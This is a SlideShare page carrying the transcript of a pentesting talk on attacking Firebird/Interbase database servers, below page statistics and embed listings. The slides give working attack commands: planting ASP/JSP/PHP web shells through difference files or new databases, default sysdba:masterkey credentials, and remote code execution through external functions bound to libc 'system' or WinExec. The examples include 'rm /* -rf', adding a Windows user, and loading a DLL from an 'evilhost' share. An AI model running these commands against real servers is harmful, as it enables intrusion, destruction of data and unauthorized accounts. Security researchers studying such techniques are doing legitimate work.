Firebird Interbase Database engine hacks or rtfm
Upcoming SlideShare
Loading in...5
×
 

Firebird Interbase Database engine hacks or rtfm

on

  • 13,132 views

Notes on database security assesment

Notes on database security assesment

Statistics

Views

Total Views
13,132
Slideshare-icon Views on SlideShare
1,818
Embed Views
11,314

Actions

Likes
0
Downloads
8
Comments
0

65 Embeds 11,314

http://habrahabr.ru 9085
http://scadastrangelove.blogspot.co.at 1032
http://blog.ptsecurity.ru 407
http://scadastrangelove.blogspot.com 175
http://scadastrangelove.blogspot.ru 148
http://m.habrahabr.ru 95
http://scadastrangelove.blogspot.de 73
http://feedly.com 51
http://scadastrangelove.blogspot.fr 24
http://scadastrangelove.blogspot.co.uk 19
http://scadastrangelove.blogspot.jp 15
http://savepearlharbor.com 14
http://strangelove32.rssing.com 12
http://scadastrangelove.blogspot.co.il 11
http://scadastrangelove.blogspot.cz 11
http://scadastrangelove.blogspot.nl 10
http://www.pvsm.ru 10
http://scadastrangelove.blogspot.se 9
http://scadastrangelove.blogspot.ca 8
http://scadastrangelove.blogspot.kr 7
http://scadastrangelove.blogspot.ch 6
http://gigamir.net 5
http://scadastrangelove.blogspot.fi 5
http://scadastrangelove.blogspot.in 5
http://scadastrangelove.blogspot.com.br 5
http://news.google.com 5
http://9008710819128128946_28233a1b7cf9f82d6dd1b7540bd2981e636d42e0.blogspot.com 4
http://www.admuncher.com 4
http://scadastrangelove.blogspot.co.nz 3
http://feedreader.com 3
http://scadastrangelove.blogspot.com.es 3
http://scadastrangelove.blogspot.com.au 3
http://translate.googleusercontent.com 3
http://sysmagazine.com 3
http://scadastrangelove.blogspot.sg 3
http://127.0.0.1 2
http://scadastrangelove.blogspot.no 2
http://digg.com 2
http://scadastrangelove.blogspot.sk 2
http://scadastrangelove.blogspot.be 2
http://rss4kindle.com.ua 2
http://scadastrangelove.blogspot.it 2
http://scadastrangelove.blogspot.ae 2
http://scadastrangelove.blogspot.com.ar 1
http://webcache.googleusercontent.com 1
https://translate.googleusercontent.com 1
http://scadastrangelove.blogspot.pt 1
http://scadastrangelove.blogspot.ro 1
http://scadastrangelove.blogspot.hk 1
http://security-corp.org 1
More...

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Firebird Interbase Database engine hacks or rtfm Firebird Interbase Database engine hacks or rtfm Presentation Transcript

    • Firebird/interbase database engine hacks or RTFM Osipov Alexey @GiftsUngiven
    • /whoami • Osipov Alexey • Web-hacker, pentester, member of SCADAStrangeLove • PHDays, BlackHat, NoSuchCon speaker • Developer of different pentesting PoC’s – XML – MySQL Twitter: @GiftsUngiven
    • Why so serious? • “Pseudo” Market shares – mysql, MSSQL, Oracle, postgresql, … • 99% – Firebird • 1% • That means – mysql, MSSQL, Oracle, postgresql, … • N ways to own them – Firebird • None ways to own it –
    • Pentesting • Requirements – SQLi • https://forum.antichat.ru/ • https://rdot.org – Account • Which is sysdba:masterkey most of the time • No ways to escape it – RW filesystem – Execute – So..
    • File creation (part 1) • Create difference file – CONNECT '<host>:<existent database>'; – ALTER DATABASE ADD DIFFERENCE FILE 'filename'; – ALTER DATABASE BEGIN BACKUP; – INSERT INTO TABLE `exploited` VALUES (‘<ASP/JSP/PHP shell>’); – COMMIT; • Your file is locked, so – EXIT;
    • File creation (part 2) • Database creation – CREATE DATABASE '<host>:<abritrary non-existent path>'; – CREATE TABLE a ('value' BLOB); – INSERT INTO a VALUES ('<ASP/JSP/PHP shell>'); – COMMIT; • Again, your file is locked – EXIT
    • RCE (part 1) • Main problem if configuration (but sometimes enabled): • • • *nix (like in PostgreSQL) – DECLARE EXTERNAL FUNCTION exec cstring(4096) RETURNS cstring(4096) ENTRY_POINT 'system' MODULE_NAME '/lib/libc.so'; – SELECT FIRST 1 exec('rm /* -rf') FROM any_table LIMIT 1;
    • RCE (part 2) • Windows – DECLARE EXTERNAL FUNCTION exec cstring(4096), integer RETURNS integer BY VALUE ENTRY_POINT 'WinExec' MODULE_NAME 'c:windowssystem32kernel32.dll'; – SELECT FIRST 1 exec('net user /add ****', 1) FROM any_table LIMIT 1; • Kudos to Alexander Tlyapov (@Rigros1) •
    • RCE (part 3) • Windows – DECLARE EXTERNAL FUNCTION exec cstring(4096) RETURNS cstring(4096) ENTRY_POINT 'Exec' MODULE_NAME 'evilhostshareudf.dll'; – SELECT FIRST 1 exec('net user /add ****') FROM any_table LIMIT 1; • No NTLM auth  on host, so SAMBA with anonymous login only • Can create any needed function
    • Questions? @GiftsUngiven